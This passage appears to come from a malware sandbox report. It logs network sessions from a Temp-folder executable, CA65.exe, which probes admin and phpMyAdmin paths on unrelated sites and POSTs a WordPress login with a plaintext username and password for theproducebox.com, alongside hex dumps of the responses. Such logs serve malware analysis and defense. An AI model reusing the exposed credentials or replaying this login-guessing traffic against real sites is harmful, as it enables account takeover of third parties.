yvSunuo/8ld62ehjr5B7kA==,vmPhUNXuQemvc7fjBI8NWewfbs+7qUVAqsIx00yI78k=,m0j2EEknGIVUW/liY8BLLm+RUUxFrhyTYE58WvxHjkkcm7On4dir39PTYYK13tG9,2d58ifebGbosy5xc+FRalpGMksnd3IwBAt8vQj5PWppYzrBY4ZCZ7qfk0aaye0TuqG9EI0zcyI4825B9mshKCg==,2UNV7KOq4oGjA5+PKsX47PIHZG7rU4AwWR8fGXl1XwJYgeUJqUXtid+86vZww+nL Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2023-12-22 20:15:07 UTC	1252	IN	Data Raw: 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 0a 20 20 20 20 2d 2d 3e 0a 3c 68 74 6d 6c 20 6e 67 2d 61 70 70 3d 22 77 69 78 45 72 72 6f 72 50 61 67 65 73 41 70 70 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e Data Ascii: ... --><!doctype html>... --><html ng-app="wixErrorPagesApp"><head> <meta name="viewport" content="width=device-width,initial-scale=1, maximum-scale=1, user-scalable=no"> <meta charset="utf-8"> <meta http-equiv="X-UA-Compatible" conten
2023-12-22 20:15:07 UTC	1252	IN	Data Raw: 5d 2d 2d 3e 0a 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 74 68 69 72 64 2d 70 61 72 74 79 2f 61 6e 67 75 6c 61 72 6a 73 2f 31 2e 32 2e 32 38 2f 61 6e 67 75 6c 61 72 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 21 2d 2d 20 20 2d 2d 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e 70 61 72 61 73 74 6f 72 61 67 65 2e 63 6f 6d 2f 73 65 72 76 69 63 65 73 2f 74 68 69 72 64 2d 70 61 72 74 79 2f 61 6e 67 75 6c 61 72 6a 73 2f 31 2e 32 2e 32 38 2f 69 31 38 6e 2f 61 6e 67 75 6c 61 72 2d 6c 6f 63 61 6c 65 5f 65 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 73 74 61 74 69 63 2e Data Ascii: ]--><script src="//static.parastorage.com/services/third-party/angularjs/1.2.28/angular.min.js"></script> ... --><script src="//static.parastorage.com/services/third-party/angularjs/1.2.28/i18n/angular-locale_en.js"></script><script src="//static.
2023-12-22 20:15:07 UTC	425	IN	Data Raw: 65 72 72 6f 72 50 61 67 65 43 74 72 6c 2e 65 72 72 6f 72 50 61 67 65 55 72 6c 22 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 6e 2d 61 6e 67 75 6c 61 72 2d 73 75 70 70 6f 72 74 65 64 2d 62 72 6f 77 73 65 72 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 68 31 20 63 6c 61 73 73 3d 22 6e 6f 6e 2d 61 6e 67 75 6c 61 72 2d 73 75 70 70 6f 72 74 65 64 2d 62 72 6f 77 73 65 72 2d 68 65 61 64 65 72 22 3e 45 72 72 6f 72 20 34 30 34 2d 4e 6f 74 42 72 61 6e 64 65 64 20 6f 63 63 75 72 72 65 64 3c 2f 68 31 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 6e 2d 61 6e 67 75 6c 61 72 2d 73 75 70 70 6f 72 74 65 64 2d 62 72 6f 77 73 65 72 2d 6c 69 6e 6b 22 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 3e 52 65 67 61 72 64 6c 65 73 73 2c 20 77 65 20 72 65 63 6f Data Ascii: errorPageCtrl.errorPageUrl"> <div class="non-angular-supported-browser-wrapper"> <h1 class="non-angular-supported-browser-header">Error 404-NotBranded occurred</h1> <div class="non-angular-supported-browser-link"> <span>Regardless, we reco

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
249	192.168.2.4	51042	20.197.30.48	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:07 UTC	175	OUT	GET //pma/ HTTP/1.1 Host: trivandrum.german.in Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:08 UTC	1105	IN	Data Raw: 48 54 54 50 2f 31 2e 30 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 46 72 69 2c 20 32 32 20 44 65 63 20 32 30 32 33 20 32 30 3a 31 35 3a 30 37 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 70 72 69 76 61 74 65 0d 0a 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 58 53 52 46 2d 54 4f 4b 45 4e 3d 65 79 4a 70 64 69 49 36 49 6c 4a 6a 61 6d 78 56 65 55 52 5a 56 47 74 58 52 33 4d 76 64 44 52 32 59 6e 42 75 61 46 45 39 50 53 49 73 49 6e 5a 68 62 48 56 6c 49 6a 6f 69 65 55 56 7a 64 6d 46 36 5a 58 63 31 5a 32 6c 31 53 48 49 72 4d 6e 6c 7a 54 33 42 54 56 47 4a 4e 53 56 6c 57 57 47 52 50 64 32 38 33 4d 56 51 7a 4d Data Ascii: HTTP/1.0 404 Not FoundDate: Fri, 22 Dec 2023 20:15:07 GMTServer: Apache/2.4.41 (Ubuntu)Cache-Control: no-cache, privateSet-Cookie: XSRF-TOKEN=eyJpdiI6IlJjamxVeURZVGtXR3MvdDR2YnBuaFE9PSIsInZhbHVlIjoieUVzdmF6ZXc1Z2l1SHIrMnlzT3BTVGJNSVlWWGRPd283MVQzM
2023-12-22 20:15:08 UTC	1945	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 70 61 67 65 20 7c 20 57 65 6c 63 6f 6d 65 20 74 6f 20 4a 6f 73 68 20 46 72 6f 6e 74 65 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 27 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f Data Ascii: <!DOCTYPE html><html><head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>404 page \| Welcome to Josh Frontend</title> <meta content='width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
250	192.168.2.4	51561	104.26.0.173	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:07 UTC	455	OUT	POST /wp-login.php HTTP/1.1 Host: theproducebox.com Accept: / Accept-Encoding: deflate, gzip Cookie: wordpress_test_cookie=WP%20Cookie%20check; PHPSESSID=8aonfjgkl3468gr5hac56tn05n User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://theproducebox.com/wp-login.php?redirect_to=https%3A%2F%2Ftheproducebox.com%2Fwp-admin%2F&reauth=1 Content-Length: 154 Content-Type: application/x-www-form-urlencoded
2023-12-22 20:15:07 UTC	154	OUT	Data Raw: 6c 6f 67 3d 63 61 6d 69 6c 6c 65 25 34 30 74 68 65 70 72 6f 64 75 63 65 62 6f 78 2e 63 6f 6d 26 70 77 64 3d 70 65 72 72 79 37 30 39 25 34 30 26 72 65 6d 65 6d 62 65 72 6d 65 3d 66 6f 72 65 76 65 72 26 77 70 2d 73 75 62 6d 69 74 3d 4c 6f 67 2b 49 6e 26 72 65 64 69 72 65 63 74 5f 74 6f 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 74 68 65 70 72 6f 64 75 63 65 62 6f 78 2e 63 6f 6d 25 32 46 77 70 2d 61 64 6d 69 6e 25 32 46 26 74 65 73 74 63 6f 6f 6b 69 65 3d 31 Data Ascii: log=camille%40theproducebox.com&pwd=perry709%40&rememberme=forever&wp-submit=Log+In&redirect_to=https%3A%2F%2Ftheproducebox.com%2Fwp-admin%2F&testcookie=1
2023-12-22 20:15:07 UTC	872	IN	HTTP/1.1 200 OK Date: Fri, 22 Dec 2023 20:15:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Powered-By: PHP/7.4.15 Pragma: no-cache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Cache-Control: max-age=0, no-cache X-Frame-Options: SAMEORIGIN Set-Cookie: wordpress_test_cookie=WP%20Cookie%20check; path=/; secure X-Mod-Pagespeed: 1.13.35.2-0 Vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=U%2FNzB39%2FbvIt3mATuKtteSxTCecltBBFfddbHaWnTSp2mOjQ29Xzjkp7420sUWNHfN0dZaz%2Fz083FTM5F5bf1aZfOJDq7FKURkSIhXCR7ffZamY7l8Z5gbpMXgGWYRt%2F%2FQEG"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 839b08f95963da57-MIA
2023-12-22 20:15:07 UTC	497	IN	Data Raw: 31 37 61 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 09 3c 74 69 74 6c 65 3e 4c 6f 67 20 49 6e 20 26 6c 73 61 71 75 6f 3b 20 54 68 65 20 50 72 6f 64 75 63 65 20 42 6f 78 20 26 23 38 32 31 32 3b 20 57 6f 72 64 50 72 65 73 73 3c 2f 74 69 74 6c 65 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 Data Ascii: 17a5<!DOCTYPE html><html lang="en-US"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/><title>Log In &lsaquo; The Produce Box — WordPress</title><meta name='robots' content='noindex, follow'/><link rel='styleshe
2023-12-22 20:15:07 UTC	1369	IN	Data Raw: 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 66 6f 72 6d 73 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 74 68 65 70 72 6f 64 75 63 65 62 6f 78 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 63 73 73 2f 66 6f 72 6d 73 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 32 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 6c 31 30 6e 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 74 68 65 70 72 6f 64 75 63 65 62 6f 78 2e 63 6f 6d 2f 77 70 2d 61 64 6d 69 6e 2f 63 73 73 2f 6c 31 30 6e 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 36 2e 34 2e 32 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 Data Ascii: <link rel='stylesheet' id='forms-css' href='https://theproducebox.com/wp-admin/css/forms.min.css?ver=6.4.2' media='all'/><link rel='stylesheet' id='l10n-css' href='https://theproducebox.com/wp-admin/css/l10n.min.css?ver=6.4.2' media='all'/><link rel='s
2023-12-22 20:15:07 UTC	1369	IN	Data Raw: 22 3e 0a 09 09 09 09 09 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 70 61 73 73 77 6f 72 64 22 20 6e 61 6d 65 3d 22 70 77 64 22 20 69 64 3d 22 75 73 65 72 5f 70 61 73 73 22 20 61 72 69 61 2d 64 65 73 63 72 69 62 65 64 62 79 3d 22 6c 6f 67 69 6e 5f 65 72 72 6f 72 22 20 63 6c 61 73 73 3d 22 69 6e 70 75 74 20 70 61 73 73 77 6f 72 64 2d 69 6e 70 75 74 22 20 76 61 6c 75 65 3d 22 22 20 73 69 7a 65 3d 22 32 30 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 63 75 72 72 65 6e 74 2d 70 61 73 73 77 6f 72 64 22 20 73 70 65 6c 6c 63 68 65 63 6b 3d 22 66 61 6c 73 65 22 20 72 65 71 75 69 72 65 64 3d 22 72 65 71 75 69 72 65 64 22 2f 3e 0a 09 09 09 09 09 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 62 75 74 74 6f 6e 22 20 63 6c 61 73 73 3d 22 62 75 74 74 6f 6e 20 62 75 74 74 6f Data Ascii: "><input type="password" name="pwd" id="user_pass" aria-describedby="login_error" class="input password-input" value="" size="20" autocomplete="current-password" spellcheck="false" required="required"/><button type="button" class="button butto
2023-12-22 20:15:07 UTC	1369	IN	Data Raw: 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 68 65 70 72 6f 64 75 63 65 62 6f 78 2e 63 6f 6d 2f 22 3e 26 6c 61 72 72 3b 20 47 6f 20 74 6f 20 54 68 65 20 50 72 6f 64 75 63 65 20 42 6f 78 3c 2f 61 3e 09 09 3c 2f 70 3e 0a 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 2f 2f 3c 21 5b 43 44 41 54 41 5b 0a 64 6f 63 75 6d 65 6e 74 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 28 27 66 6f 72 6d 27 29 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 27 73 68 61 6b 65 27 29 3b 0a 2f 2f 5d 5d 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 74 68 65 70 72 6f Data Ascii: <a href="https://theproducebox.com/">← Go to The Produce Box</a></p></div><script type="text/javascript">//<![CDATA[document.querySelector('form').classList.add('shake');//...</script><script type="text/javascript" src="https://thepro
2023-12-22 20:15:07 UTC	1369	IN	Data Raw: 6b 73 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 63 36 61 65 63 39 61 38 64 34 65 35 61 35 64 35 34 33 61 31 22 20 69 64 3d 22 77 70 2d 68 6f 6f 6b 73 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 74 68 65 70 72 6f 64 75 63 65 62 6f 78 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 64 69 73 74 2f 69 31 38 6e 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 37 37 30 31 62 30 63 33 38 35 37 66 39 31 34 32 31 32 65 66 22 20 69 64 3d 22 77 70 2d 69 31 38 6e 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 69 64 3d 22 77 70 2d 69 31 38 6e 2d 6a 73 2d Data Ascii: ks.min.js?ver=c6aec9a8d4e5a5d543a1" id="wp-hooks-js"></script><script type="text/javascript" src="https://theproducebox.com/wp-includes/js/dist/i18n.min.js?ver=7701b0c3857f914212ef" id="wp-i18n-js"></script><script type="text/javascript" id="wp-i18n-js-
2023-12-22 20:15:07 UTC	88	IN	Data Raw: 6e 2f 6a 73 2f 75 73 65 72 2d 70 72 6f 66 69 6c 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 34 2e 32 22 20 69 64 3d 22 75 73 65 72 2d 70 72 6f 66 69 6c 65 2d 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 09 3c 2f 68 74 6d 6c 3e 0a 09 0d 0a Data Ascii: n/js/user-profile.min.js?ver=6.4.2" id="user-profile-js"></script></body></html>
2023-12-22 20:15:07 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
251	192.168.2.4	51724	141.193.213.10	443	5660	C:\Users\user\AppData\Local\Temp\CA65.exe

Timestamp	Bytes transferred	Direction	Data
2023-12-22 20:15:07 UTC	329	OUT	GET /admin HTTP/1.1 Host: jaydien.com Accept: / Accept-Encoding: deflate, gzip Cookie: __cf_bm=Ij8.GzKOUCSeRteciNZvyEdv9xi61b5fGJ8KzBa4qEc-1703276106-1-AYm7nFYABeaygz+QR8NhbHojTjXUZpm+CbdCJfFcOg3A6iLH1+GSklXf0k+L9KNZVX3GH4SCprgzeGHLYiizQQg= User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2023-12-22 20:15:08 UTC	1354	IN	HTTP/1.1 403 Forbidden Date: Fri, 22 Dec 2023 20:15:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Vary: Accept-Encoding Vary: Accept-Encoding Set-Cookie: apbct_timestamp=1703276107; path=/; secure; HttpOnly; SameSite=Lax Set-Cookie: apbct_site_landing_ts=1703276107; path=/; secure; HttpOnly; SameSite=Lax Set-Cookie: apbct_page_hits=1; path=/; secure; HttpOnly; SameSite=Lax Set-Cookie: apbct_cookies_test=%257B%2522cookies_names%2522%253A%255B%2522apbct_timestamp%2522%252C%2522apbct_site_landing_ts%2522%252C%2522apbct_page_hits%2522%255D%252C%2522check_value%2522%253A%2522a5e496c8b5111dcd746f99995c2a0fed%2522%257D; path=/; secure; HttpOnly; SameSite=Lax Set-Cookie: apbct_urls=%7B%22jaydien.com%2Fadmin%22%3A%5B1703276107%5D%7D; expires=Mon, 25 Dec 2023 20:15:07 GMT; Max-Age=259200; path=/; domain=jaydien.com; secure; HttpOnly; SameSite=Lax Set-Cookie: apbct_site_referer=UNKNOWN; expires=Mon, 25 Dec 2023 20:15:07 GMT; Max-Age=259200; path=/; domain=jaydien.com; secure; HttpOnly; SameSite=Lax Expires: Fri, 01 Jan 71 00:00:00 +0000 Pragma: no-cache X-Powered-By: WP Engine X-Cacheable: NO:403 Cache-Control: max-age=0, must-revalidate, private X-Cache: MISS X-Cache-Group: normal CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 839b08f99d1b12a7-MIA
2023-12-22 20:15:08 UTC	32	IN	Data Raw: 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a Data Ascii: alt-svc: h3=":443"; ma=86400
2023-12-22 20:15:08 UTC	1352	IN	Data Raw: 31 66 39 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 27 65 6e 27 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 27 75 74 66 2d 38 27 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 76 69 65 77 70 6f 72 74 27 20 63 6f 6e 74 65 6e 74 3d 27 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 27 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 63 61 63 68 65 22 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 61 63 68 65 2d 63 6f 6e 74 72 6f 6c 22 20 63 6f 6e 74 65 6e 74 3d 22 70 72 69 76 61 74 65 22 3e Data Ascii: 1f92<!DOCTYPE html><html lang='en'><head><meta charset='utf-8' /><meta name='viewport' content='width=device-width, initial-scale=1' /><meta http-equiv="cache-control" content="no-cache"><meta http-equiv="cache-control" content="private">
2023-12-22 20:15:08 UTC	1369	IN	Data Raw: 6b 2d 62 6f 75 6e 63 65 64 65 6c 61 79 20 31 2e 34 73 20 69 6e 66 69 6e 69 74 65 20 65 61 73 65 2d 69 6e 2d 6f 75 74 20 62 6f 74 68 3b 0a 09 09 09 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 6b 2d 62 6f 75 6e 63 65 64 65 6c 61 79 20 31 2e 34 73 20 69 6e 66 69 6e 69 74 65 20 65 61 73 65 2d 69 6e 2d 6f 75 74 20 62 6f 74 68 3b 0a 09 09 7d 0a 0a 09 09 2e 73 70 69 6e 6e 65 72 20 2e 62 6f 75 6e 63 65 31 20 7b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 20 2d 30 2e 33 32 73 3b 0a 09 09 09 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 20 2d 30 2e 33 32 73 3b 0a 09 09 7d 0a 0a 09 09 2e 73 70 69 6e 6e 65 72 20 2e 62 6f 75 6e 63 65 32 20 7b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 20 2d 30 Data Ascii: k-bouncedelay 1.4s infinite ease-in-out both;animation: sk-bouncedelay 1.4s infinite ease-in-out both;}.spinner .bounce1 {-webkit-animation-delay: -0.32s;animation-delay: -0.32s;}.spinner .bounce2 {-webkit-animation-delay: -0
2023-12-22 20:15:08 UTC	1369	IN	Data Raw: 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 20 3b 0a 09 09 7d 0a 09 09 61 20 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 30 37 33 61 61 3b 0a 09 09 7d 0a 09 09 61 3a 68 6f 76 65 72 2c 0a 09 09 61 3a 61 63 74 69 76 65 20 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 30 30 36 37 39 39 3b 0a 09 09 7d 0a 09 09 61 3a 66 6f 63 75 73 20 7b 0a 09 09 09 63 6f 6c 6f 72 3a 20 23 31 32 34 39 36 34 3b 0a 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 68 61 64 6f 77 3a 0a 09 09 09 09 09 30 20 30 20 30 20 31 70 78 20 23 35 62 39 64 64 39 2c 0a 09 09 09 09 09 30 20 30 20 32 70 78 20 31 70 78 20 72 67 62 61 28 33 30 2c 20 31 34 30 2c 20 31 39 30 2c 20 30 2e 38 29 3b 0a 09 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 0a Data Ascii: rgin-bottom: 10px;font-size: 14px ;}a {color: #0073aa;}a:hover,a:active {color: #006799;}a:focus {color: #124964;-webkit-box-shadow:0 0 0 1px #5b9dd9,0 0 2px 1px rgba(30, 140, 190, 0.8);box-shadow:
2023-12-22 20:15:08 UTC	1369	IN	Data Raw: 3d 27 68 74 74 70 73 3a 2f 2f 6a 61 79 64 69 65 6e 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 6a 71 75 65 72 79 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 27 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 3c 73 63 72 69 70 74 3e 0a 09 09 76 61 72 20 63 74 50 75 62 6c 69 63 46 75 6e 63 74 69 6f 6e 73 20 3d 20 7b 22 5f 61 6a 61 78 5f 6e 6f 6e 63 65 22 3a 22 30 65 36 66 31 30 39 34 63 66 22 2c 22 5f 72 65 73 74 5f 6e 6f 6e 63 65 22 3a 22 34 39 66 38 64 38 64 62 32 31 22 2c 22 5f 61 6a 61 78 5f 75 72 6c 22 3a 22 5c 2f 77 70 2d 61 64 6d 69 6e 5c 2f 61 64 6d 69 6e 2d 61 6a 61 78 2e 70 68 70 22 2c 22 5f 72 65 73 74 5f 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 6a 61 79 64 69 65 6e 2e 63 6f 6d 5c 2f 77 70 2d 6a 73 6f 6e 5c 2f 22 2c 22 64 61 74 61 5f 5f Data Ascii: ='https://jaydien.com/wp-includes/js/jquery/jquery.min.js'></script><script>var ctPublicFunctions = {"_ajax_nonce":"0e6f1094cf","_rest_nonce":"49f8d8db21","_ajax_url":"\/wp-admin\/admin-ajax.php","_rest_url":"https:\/\/jaydien.com\/wp-json\/","data__
2023-12-22 20:15:08 UTC	1369	IN	Data Raw: 65 2c 20 70 6c 65 61 73 65 20 6d 61 6b 65 20 73 75 72 65 20 74 68 61 74 20 79 6f 75 20 68 61 76 65 20 65 6e 61 62 6c 65 64 20 4a 61 76 61 53 63 72 69 70 74 2e 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 27 6a 73 5f 70 61 73 73 65 64 27 3e 0a 09 09 09 3c 68 33 3e 50 6c 65 61 73 65 20 63 6c 69 63 6b 20 74 68 65 20 6c 69 6e 6b 20 62 65 6c 6f 77 20 74 6f 20 70 61 73 73 20 74 68 65 20 70 72 6f 74 65 63 74 69 6f 6e 2c 3c 2f 68 33 3e 0a 09 09 09 3c 61 20 68 72 65 66 3d 27 2f 61 64 6d 69 6e 27 3e 3c 73 63 72 69 70 74 3e 67 65 74 5f 63 75 72 72 65 6e 74 5f 75 72 6c 28 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 61 3e 0a 09 09 09 3c 62 72 20 2f 3e 0a 09 09 09 3c 70 20 63 6c 61 73 73 3d 27 6a 73 5f 6e 6f 74 69 63 65 27 3e 4f 72 20 79 6f 75 20 Data Ascii: e, please make sure that you have enabled JavaScript.</div> <div id='js_passed'><h3>Please click the link below to pass the protection,</h3><a href='/admin'><script>get_current_url();</script></a><br /><p class='js_notice'>Or you
